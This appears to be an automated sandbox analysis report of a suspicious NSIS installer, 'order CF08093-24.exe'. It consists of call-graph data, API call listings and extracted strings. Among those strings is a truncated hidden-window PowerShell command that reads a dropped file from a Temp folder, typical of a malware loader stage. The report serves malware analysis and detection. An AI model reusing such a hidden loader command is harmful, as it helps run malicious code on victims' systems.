SendMessageW 4645->4650 4647->4648 4651 405366 GlobalFree 4648->4651 4648->4656 4649 4054e7 4649->4640 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4649->4654 4653 405307 4650->4653 4651->4656 4652 405166 GetWindowLongW SetWindowLongW 4655 40517f 4652->4655 4662 405318 SendMessageW 4653->4662 4654->4640 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4649 4672 4053a8 4656->4672 4684 404efb 4656->4684 4677 4044f5 SendMessageW 4657->4677 4678 4044f5 SendMessageW 4658->4678 4659->4631 4659->4641 4660->4652 4661 4050de SendMessageW 4660->4661 4663 405161 4660->4663 4666 405130 SendMessageW 4660->4666 4667 40511c SendMessageW 4660->4667 4661->4660 4662->4635 4663->4652 4663->4655 4666->4660 4667->4660 4669 4054b2 4670 4054bd InvalidateRect 4669->4670 4673 4054c9 4669->4673 4670->4673 4671 4053d6 SendMessageW 4676 4053ec 4671->4676 4672->4671 4672->4676 4673->4649 4693 404e36 4673->4693 4675 405460 SendMessageW SendMessageW 4675->4676 4676->4669 4676->4675 4677->4640 4678->4626 4680 404eda SendMessageW 4679->4680 4681 404e9e GetMessagePos ScreenToClient SendMessageW 4679->4681 4682 404ed2 4680->4682 4681->4682 4683 404ed7 4681->4683 4682->4659 4683->4680 4696 406541 lstrcpynW 4684->4696 4686 404f0e 4697 406488 wsprintfW 4686->4697 4688 404f18 4689 40140b 2 API calls 4688->4689 4690 404f21 4689->4690 4698 406541 lstrcpynW 4690->4698 4692 404f28 4692->4672 4699 404d6d 4693->4699 4695 404e4b 4695->4649 4696->4686 4697->4688 4698->4692 4702 404d86 4699->4702 4700 40657e 21 API calls 4701 404dea 4700->4701 4703 40657e 21 API calls 4701->4703 4702->4700 4704 404df5 4703->4704 4705 40657e 21 API calls 4704->4705 4706 404e0b lstrlenW wsprintfW SetDlgItemTextW 4705->4706 4706->4695 4002 4024af 4003 402dcb 21 API calls 4002->4003 4004 4024c1 4003->4004 4005 402dcb 21 API calls 4004->4005 4006 4024cb 4005->4006 4019 402e5b 4006->4019 4009 402953 4010 402503 4012 40250f 4010->4012 4014 402da9 21 API calls 4010->4014 4011 402dcb 21 API calls 4013 4024f9 lstrlenW 4011->4013 4015 40252e RegSetValueExW 4012->4015 4016 4032d9 39 API calls 4012->4016 4013->4010 4014->4012 4017 402544 RegCloseKey 4015->4017 4016->4015 4017->4009 4020 402e76 4019->4020 4023 4063dc 4020->4023 4024 4063eb 4023->4024 4025 4024db 4024->4025 4026 4063f6 RegCreateKeyExW 4024->4026 4025->4009 4025->4010 4025->4011 4026->4025 4707 404630 lstrlenW 4708 404651 WideCharToMultiByte 4707->4708 4709 40464f 4707->4709 4709->4708 4710 402930 4711 402dcb 21 API calls 4710->4711 4712 402937 FindFirstFileW 4711->4712 4713 40295f 4712->4713 4717 40294a 4712->4717 4714 402968 4713->4714 4718 406488 wsprintfW 4713->4718 4719 406541 lstrcpynW 4714->4719 4718->4714 4719->4717 4720 401931 4721 401968 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 40196d 4722->4723 4724 405c4d 71 API calls 4723->4724 4725 401976 4724->4725 4726 4049b1 4727 4049dd 4726->4727 4728 4049ee 4726->4728 4787 405b85 GetDlgItemTextW 4727->4787 4730 4049fa GetDlgItem 4728->4730 4736 404a59 4728->4736 4733 404a0e 4730->4733 4731 404b3d 4735 404cec 4731->4735 4789 405b85 GetDlgItemTextW 4731->4789 4732 4049e8 4734 4067ef 5 API calls 4732->4734 4738 404a22 SetWindowTextW 4733->4738 4739 405ebb 4 API calls 4733->4739 4734->4728 4743 404527 8 API calls 4735->4743 4736->4731 4736->4735 4740 40657e 21 API calls 4736->4740 4742 4044c0 22 API calls 4738->4742 4744 404a18 4739->4744 4745 404acd SHBrowseForFolderW 4740->4745 4741 404b6d 4746 405f18 18 API calls 4741->4746 4747 404a3e 4742->4747 4748 404d00 4743->4748 4744->4738 4752 405e10 3 API calls 4744->4752 4745->4731 4749 404ae5 CoTaskMemFree 4745->4749 4750 404b73 4746->4750 4751 4044c0 22 API calls 4747->4751 4753 405e10 3 API calls 4749->4753 4790 406541 lstrcpynW 4750->4790 4754 404a4c 4751->4754 4752->4738 4755 404af2 4753->4755 4788 4044f5 SendMessageW 4754->4788 4758 404b29 SetDlgItemTextW 4755->4758 4763 40657e 21 API calls 4755->4763 4758->4731 4759 404a52 4761 406935 5 API calls 4759->4761 4760 404b8a 4762 406935 5 API calls 4760->4762 4761->4736 4769 404b91 4762->4769 4764 404b11 lstrcmpiW 4763->4764 4764->4758 4767 404b22 lstrcatW 4764->4767 4765 404bd2 4791 406541 lstrcpynW 4765->4791 4767->4758 4768 404bd9 4770 405ebb 4 API calls 4768->4770 4769->4765 4773 405e5c 2 API calls 4769->4773 4775 404c2a 4769->4775 4771 404bdf GetDiskFreeSpaceW 4770->4771 4774 404c03 MulDiv 4771->4774 4771->4775 4773->4769 4774->4775 4776 404c9b 4775->4776 4778 404e36 24 API calls 4775->4778 4777 404cbe 4776->4777 4779 40140b 2 API calls 4776->4779 4792 4044e2 KiUserCallbackDispatcher 4777->4792 4780 404c88 4778->4780 4779->4777 4782 404c9d SetDlgItemTextW 4780->4782 4783 404c8d 4780->4783 4782->4776 4785 404d6d 24 API calls 4783->4785 4784 404cda 4784->4735 4786 40490a SendMessageW 4784->4786 4785->4776 4786->4735 4787->4732 4788->4759 4789->4741 4790->4760 4791->4768 4792->4784 4793 401934 4794 402dcb 21 API calls 4793->4794 4795 40193b 4794->4795 4796 405ba1 MessageBoxIndirectW 4795->4796 4797 401944 4796->4797 4798 4028b6 4799 4028bd 4798->4799 4801 402bce 4798->4801 4800 402da9 21 API calls 4799->4800 4802 4028c4 4800->4802 4803 4028d3 SetFilePointer 4802->4803 4803->4801 4804 4028e3 4803->4804 4806 406488 wsprintfW 4804->4806 4806->4801 4807 401f37 4808 402dcb 21 API calls 4807->4808 4809 401f3d 4808->4809 4810 402dcb 21 API calls 4809->4810 4811 401f46 4810->4811 4812 402dcb 21 API calls 4811->4812 4813 401f4f 4812->4813 4814 402dcb 21 API calls 4813->4814 4815 401f58 4814->4815 4816 401423 28 API calls 4815->4816 4817 401f5f 4816->4817 4824 405b67 ShellExecuteExW 4817->4824 4819 401fa7 4820 402953 4819->4820 4821 4069e0 5 API calls 4819->4821 4822 401fc4 CloseHandle 4821->4822 4822->4820 4824->4819 4825 402fb8 4826 402fe3 4825->4826 4827 402fca SetTimer 4825->4827 4828 403038 4826->4828 4829 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4826->4829 4827->4826 4829->4828 4830 4014b8 4831 4014be 4830->4831 4832 401389 2 API calls 4831->4832 4833 4014c6 4832->4833 4834 40553a 4835 40554a 4834->4835 4836 40555e 4834->4836 4838 405550 4835->4838 4839 4055a7 4835->4839 4837 405566 IsWindowVisible 4836->4837 4845 40557d 4836->4845 4837->4839 4841 405573 4837->4841 4840 40450c SendMessageW 4838->4840 4842 4055ac CallWindowProcW 4839->4842 4843 40555a 4840->4843 4844 404e7b 5 API calls 4841->4844 4842->4843 4844->4845 4845->4842 4846 404efb 4 API calls 4845->4846 4846->4839 4847 401d3c 4848 402da9 21 API calls 4847->4848 4849 401d42 IsWindow 4848->4849 4850 401a45 4849->4850

                                                                            Executed Functions

                                                                            Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 12 403603 5->12 7 40360f-403623 call 4068c5 lstrlenA 6->7 13 403625-403641 call 406935 * 3 7->13 12->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 26 40364b 21->26 26->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 39 4036f0-4036f5 36->39 40 4036f6-4036fa 36->40 44 403860-40387a DeleteFileW call 4030a2 37->44 45 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->45 39->40 42 403700-403706 40->42 43 4037bb-4037ca call 405e3d 40->43 47 403720-403759 42->47 48 403708-40370f 42->48 43->32 61 4037cc-4037cd 43->61 66 403880-403886 44->66 67 403a67-403a77 call 403b39 OleUninitialize 44->67 45->44 64 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 45->64 49 403776-4037b0 47->49 50 40375b-403760 47->50 54 403711-403714 48->54 55 403716 48->55 58 4037b2-4037b6 49->58 59 4037b8-4037ba 49->59 50->49 56 403762-40376a 50->56 54->47 54->55 55->47 62 403771 56->62 63 40376c-40376f 56->63 58->59 65 4037dc-4037e9 call 406541 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 40388c-403897 call 405e3d 66->70 71 40391f-403926 call 403c13 66->71 78 403a79-403a89 call 405ba1 ExitProcess 67->78 79 403a9d-403aa3 67->79 81 4038e5-4038ef 70->81 82 403899-4038ce 70->82 77 40392b-40392f 71->77 77->67 83 403b21-403b29 79->83 84 403aa5-403abb GetCurrentProcess OpenProcessToken 79->84 89 4038f1-4038ff call 405f18 81->89 90 403934-40395a call 405b0c lstrlenW call 406541 81->90 86 4038d0-4038d4 82->86 91 403b2b 83->91 92 403b2f-403b33 ExitProcess 83->92 87 403af1-403aff call 406935 84->87 88 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 84->88 94 4038d6-4038db 86->94 95 4038dd-4038e1 86->95 104 403b01-403b0b 87->104 105 403b0d-403b18 ExitWindowsEx 87->105 88->87 89->67 106 403905-40391b call 406541 * 2 89->106 110 40396b-403983 90->110 111 40395c-403966 call 406541 90->111 91->92 94->95 99 4038e3 94->99 95->86 95->99 99->81 104->105 108 403b1a-403b1c call 40140b 104->108 105->83 105->108 106->71 108->83 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 126 4039c9-4039cb 122->126 123->126 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 126->128 129 4039cd-4039d7 GetFileAttributesW 126->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 130 4039f8-403a03 129->130 131 4039d9-4039e2 DeleteFileW 129->131 130->116 134 403a05 130->134 131->130 133 4039e4-4039f6 call 405c4d 131->133 133->118 133->130 134->67 137->67 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 0040353F
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                            • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                            • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                            • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\order CF08093-24.exe",00000020,"C:\Users\user\Desktop\order CF08093-24.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                            • wsprintfW.USER32 ref: 0040399B
                                                                            • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                                            • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                                              • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                            • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                              • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                              • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                            • ExitProcess.KERNEL32 ref: 00403A89
                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                            • ExitProcess.KERNEL32 ref: 00403B33
                                                                              • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm$~nsu%X.tmp
                                                                            • API String ID: 1813718867-2140108915
                                                                            • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                            • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                            • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                            • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                                                            Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 174 40580b-40580e 152->174 175 4057ef-405809 SendMessageW * 2 152->175 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 163 405917-40591d 158->163 164 40596b-40596f 158->164 161 405930-405939 call 404527 159->161 162 4058f7-405906 ShowWindow * 2 call 4044f5 159->162 171 40593e-405942 161->171 162->158 169 405945-405955 ShowWindow 163->169 170 40591f-40592b call 404499 163->170 164->161 167 405971-405977 164->167 167->161 176 405979-40598c SendMessageW 167->176 172 405965-405966 call 404499 169->172 173 405957-405960 call 4055c6 169->173 170->161 172->164 173->172 180 405810-40581c SendMessageW 174->180 181 40581e-405835 call 4044c0 174->181 175->174 182 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 176->182 183 405a8e-405a90 176->183 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188 4059d2-4059e7 TrackPopupMenu 182->188 189 4059bf-4059cf GetWindowRect 182->189 183->171 188->183 193 4059ed-405a04 188->193 189->188 194 40585a 190->194 195 40584d-405858 ShowWindow 190->195 191->183 192 405892-4058aa SendMessageW * 2 191->192 192->183 196 405a09-405a24 SendMessageW 193->196 197 405860-405866 call 4044f5 194->197 195->197 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                            • GetClientRect.USER32(?,?), ref: 004057AF
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                            • ShowWindow.USER32(00000000), ref: 004058FE
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                            • ShowWindow.USER32(00000008), ref: 0040594D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                            • CreatePopupMenu.USER32 ref: 00405992
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                            • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                            • EmptyClipboard.USER32 ref: 00405A2D
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                            • CloseClipboard.USER32 ref: 00405A88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                            • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                            • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                            • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
                                                                            Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 667 406c5f-406c64 668 406cd5-406cf3 667->668 669 406c66-406c95 667->669 670 4072cb-4072e0 668->670 671 406c97-406c9a 669->671 672 406c9c-406ca0 669->672 675 4072e2-4072f8 670->675 676 4072fa-407310 670->676 677 406cac-406caf 671->677 673 406ca2-406ca6 672->673 674 406ca8 672->674 673->677 674->677 678 407313-40731a 675->678 676->678 679 406cb1-406cba 677->679 680 406ccd-406cd0 677->680 684 407341-40734d 678->684 685 40731c-407320 678->685 681 406cbc 679->681 682 406cbf-406ccb 679->682 683 406ea2-406ec0 680->683 681->682 688 406d35-406d63 682->688 686 406ec2-406ed6 683->686 687 406ed8-406eea 683->687 694 406ae3-406aec 684->694 689 407326-40733e 685->689 690 4074cf-4074d9 685->690 692 406eed-406ef7 686->692 687->692 695 406d65-406d7d 688->695 696 406d7f-406d99 688->696 689->684 693 4074e5-4074f8 690->693 698 406ef9 692->698 699 406e9a-406ea0 692->699 697 4074fd-407501 693->697 700 406af2 694->700 701 4074fa 694->701 702 406d9c-406da6 695->702 696->702 721 407481-40748b 698->721 722 406e7f-406e97 698->722 699->683 710 406e3e-406e48 699->710 706 406af9-406afd 700->706 707 406c39-406c5a 700->707 708 406b9e-406ba2 700->708 709 406c0e-406c12 700->709 701->697 703 406dac 702->703 704 406d1d-406d23 702->704 727 406d02-406d1a 703->727 728 407469-407473 703->728 717 406dd6-406ddc 704->717 718 406d29-406d2f 704->718 706->693 714 406b03-406b10 706->714 707->670 712 406ba8-406bc1 708->712 713 40744e-407458 708->713 715 406c18-406c2c 709->715 716 40745d-407467 709->716 719 40748d-407497 710->719 720 406e4e-407017 710->720 723 406bc4-406bc8 712->723 713->693 714->701 726 406b16-406b5c 714->726 729 406c2f-406c37 715->729 716->693 724 406e3a 717->724 725 406dde-406dfc 717->725 718->688 718->724 719->693 720->694 721->693 722->699 723->708 731 406bca-406bd0 723->731 724->710 732 406e14-406e26 725->732 733 406dfe-406e12 725->733 734 406b84-406b86 726->734 735 406b5e-406b62 726->735 727->704 728->693 729->707 729->709 736 406bd2-406bd9 731->736 737 406bfa-406c0c 731->737 738 406e29-406e33 732->738 733->738 741 406b94-406b9c 734->741 742 406b88-406b92 734->742 739 406b64-406b67 GlobalFree 735->739 740 406b6d-406b7b GlobalAlloc 735->740 743 406be4-406bf4 GlobalAlloc 736->743 744 406bdb-406bde GlobalFree 736->744 737->729 738->717 745 406e35 738->745 739->740 740->701 746 406b81 740->746 741->723 742->741 742->742 743->701 743->737 744->743 748 407475-40747f 745->748 749 406dbb-406dd3 745->749 746->734 748->693 749->717
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
